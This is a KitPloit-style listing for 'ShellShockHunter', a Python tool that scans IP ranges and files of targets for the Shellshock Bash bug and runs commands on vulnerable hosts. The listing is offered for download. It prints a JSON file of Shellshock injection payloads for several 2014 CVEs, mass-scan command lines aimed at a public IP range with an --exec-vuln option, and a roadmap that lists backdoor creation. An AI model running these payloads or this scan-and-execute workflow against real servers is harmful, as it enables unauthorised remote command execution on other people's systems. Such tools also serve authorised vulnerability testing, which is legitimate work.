Lucene search

K
kitploitKitPloitKITPLOIT:2779031464033627796
HistoryFeb 10, 2021 - 11:30 a.m.

ShellShockHunter - It's A Simple Tool For Test Vulnerability Shellshock

2021-02-1011:30:00
www.kitploit.com
1014

9.8 High

CVSS3

Attack Vector

NETWORK

Attack Complexity

LOW

Privileges Required

NONE

User Interaction

NONE

Scope

UNCHANGED

Confidentiality Impact

HIGH

Integrity Impact

HIGH

Availability Impact

HIGH

CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H

10 High

AI Score

Confidence

High

10 High

CVSS2

Access Vector

NETWORK

Access Complexity

LOW

Authentication

NONE

Confidentiality Impact

COMPLETE

Integrity Impact

COMPLETE

Availability Impact

COMPLETE

AV:N/AC:L/Au:N/C:C/I:C/A:C

0.976 High

EPSS

Percentile

100.0%

It’s a simple tool for test vulnerability shellshock

Autor:    MrCl0wn  
Blog:     http://blog.mrcl0wn.com  
GitHub:   https://github.com/MrCl0wnLab  
Twitter:  https://twitter.com/MrCl0wnLab  
Email:    mrcl0wnlab\@\gmail.com  

Shellshock (software bug)

Shellshock, also known as Bashdoor, is a family of security bugs in the Unix Bash shell, the first of which was disclosed on 24 September 2014. Shellshock could enable an attacker to cause Bash to execute arbitrary commands and gain unauthorized access to many Internet-facing services, such as web servers, that use Bash to process requests.

Disclaimer

This or previous program is for Educational purpose ONLY. Do not use it without permission. The usual disclaimer applies, especially the fact that me (MrCl0wnLab) is not liable for any damages caused by direct or indirect use of the information or functionality provided by these programs. The author or any Internet provider bears NO responsibility for content or misuse of these programs or any derivatives thereof. By using these programs you accept the fact that any damage (dataloss, system crash, system compromise, etc.) caused by the use of these programs is not MrCl0wnLab’s responsibility.

Installation

> Use the package manager pip

Pip

pip install shodan  
pip install ipinfo  

Help

python main.py --help  
  
usage: tool [-h] [--file <ips.txt>] [--range <ip-start>,<ip-end>] [--cmd-cgi <command shell>] [--exec-vuln <command shell>] [--thread <10>] [--check] [--ssl] [--cgi-file <cgi.txt>] [--timeout <5>] [--all] [--debug]  
  
optional arguments:  
  -h, --help        show this help message and exit  
  --file <ips.txt>  File targets  
  --range <ip-start>,<ip-end>  
                    Range IP Ex: 192.168.15.1,192.168.15.100  
  --cmd-cgi <command shell>  
                    Command: uname -a  
  --exec-vuln <command shell>  
                    Executing commands on [vulnerable](<https://www.kitploit.com/search/label/Vulnerable> "vulnerable" ) targets  
  --thread <10>, -t <10>  
                    Eg. 20  
  --check           Checker vuln  
  --ssl             Set protocol https  
  --cgi-file &l   t;cgi.txt>  
                    Set file cgi  
  --timeout <5>     Set timeout conection  
  --all             Teste all payloads  
  --debug           Set debugs  

Command e.g:

python main.py --range '194.206.187.X,194.206.187.XXX' --check --thread 40 --ssl  
  
python main.py --range '194.206.187.X,194.206.187.XXX' --check --thread 10 --ssl --cgi-file 'wordlist/cgi.txt'  
  
python main.py --range '194.206.187.X,194.206.187.XXX' --cmd 'id;uname -a' --thread 10 --ssl --cgi-file 'wordlist/cgi.txt'  
  
python main.py --file targets.txt --cmd 'id;uname -a' --thread 10 --ssl --cgi-file 'wordlist/cgi.txt'  
  
python main.py --file targets.txt --cmd 'id;uname -a' --thread 10 --ssl --cgi-file 'wordlist/cgi.txt' --all  
  
python main.py --range '194.206.187.X,194.206.187.XXX' --check --thread 40 --ssl --cgi-file 'wordlist/cgi2.txt' --exec-vuln 'curl -v -k -i "_TARGET_"'  
  
python main.py --range '194.206.187.X,194.206.187.XXX' --check --thread 40 --ssl --cgi-file 'wordlist/cgi2.txt' --exec-vuln './exploit -t "_TARGET_"'  

Prints:

START

PROCESS

EXPECIAL COMMAND ( --exec-vuln ‘echo "_TARGET_"’ )

Source file ( Exploits )

> pwd: assets/exploits.json

{  
    "DEFAULT":  
        "() { :; }; echo ; /bin/bash -c '_COMMAND_'",  
    "CVE-2014-6271":   
        "() { :; }; echo _CHECKER_; /bin/bash -c '_COMMAND_'",  
    "CVE-2014-6271-2":  
        "() { :;}; echo '_CHECKER_' 'BASH_FUNC_x()=() { :;}; echo _CHECKER_' bash -c 'echo _COMMAND_'",  
    "CVE-2014-6271-3":  
        "() { :; }; echo ; /bin/bash -c '_COMMAND_';echo _CHECKER_;",  
    "CVE-2014-7169":  
        "() { (a)=>\\' /bin/bash -c 'echo _CHECKER_'; cat echo",  
    "CVE-2014-7186":  
        "/bin/bash -c 'true <<EOF <<EOF <<EOF <<EOF <<EOF <<EOF <<EOF <<EOF <<EOF <<EOF <<EOF <<EOF <<EOF <<EOF' || echo '_CHECKER_, redir_stack'",  
    "CVE-2014-7187":  
        "(for x in {1..200} ; do echo \"for x$x in ; do :\"; done; for x in {1..200} ; do echo done ; done) | /bin/bash || echo '_CHECKER_, word_lineno'",  
    "CVE-2014-6278":  
           "() { _; } >_[$($())] { echo _CHECKER_; id; } /bin/bash -c '_COMMAND_'",  
    "CVE-2014-6278-2":      
        "shellshocker='() { echo _CHECKER_; }' bash -c shellshocker",  
    "CVE-2014-6277":  
        "() { x() { _; }; x() { _; } <<a; } /bin/bash -c _COMMAND_;echo _CHECKER_",  
    "CVE-2014-*":  
        "() { }; echo _CHECKER_' /bin/bash -c '_COMMAND_'"  
}

Source file ( Config )

> pwd: assets/config.json

{  
    "config": {  
        "threads": 10,  
        "path": {  
            "path_output": "output/",  
            "path_wordlist": "wordlist/",  
            "path_modules": "modules/",  
            "path_assets": "assets/"  
        },  
        "files_assets":{  
            "config": "assets/config.json",  
            "autor": "assets/autor.json",  
            "exploits": "assets/exploits.json"  
        },  
        "api":{  
            "shodan":"",  
            "ipinfo":""  
        }  
    }  
}

Tree

├── assets  
│   ├── autor.json  
│   ├── config.json  
│   ├── exploits.json  
│   └── prints  
│       ├── banner.png  
│       ├── print01.png  
│       ├── print02.png  
│       └── print03.png  
├── main.py  
├── modules  
│   ├── banner_shock.py  
│   ├── color_shock.py  
│   ├── file_shock.py  
│   ├── __init__.py  
│   ├── request_shock.py  
│   ├── shodan_shock.py  
│   └─&#9472   ; thread_shock.py  
├── output  
│   └── vuln.txt  
├── README.md  
└── wordlist  
    └── cgi.txt

Ref

Roadmap

I started this project to study a little more python and interact more with APIS like shodan and ipinfo.

  • Command line structure
  • Banner
  • File management class
  • HttpRequests management class
  • Thread management class
  • Source file for exploits
  • Color in process
  • Shell Exec on vulnerable targets
  • Process debug
  • Integration with ipinfo api
  • Integration with ipinfo api
  • Integration with telegram api
  • Backdoor creation
  • Visual filter
  • Header manipulation

Download ShellShockHunter

9.8 High

CVSS3

Attack Vector

NETWORK

Attack Complexity

LOW

Privileges Required

NONE

User Interaction

NONE

Scope

UNCHANGED

Confidentiality Impact

HIGH

Integrity Impact

HIGH

Availability Impact

HIGH

CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H

10 High

AI Score

Confidence

High

10 High

CVSS2

Access Vector

NETWORK

Access Complexity

LOW

Authentication

NONE

Confidentiality Impact

COMPLETE

Integrity Impact

COMPLETE

Availability Impact

COMPLETE

AV:N/AC:L/Au:N/C:C/I:C/A:C

0.976 High

EPSS

Percentile

100.0%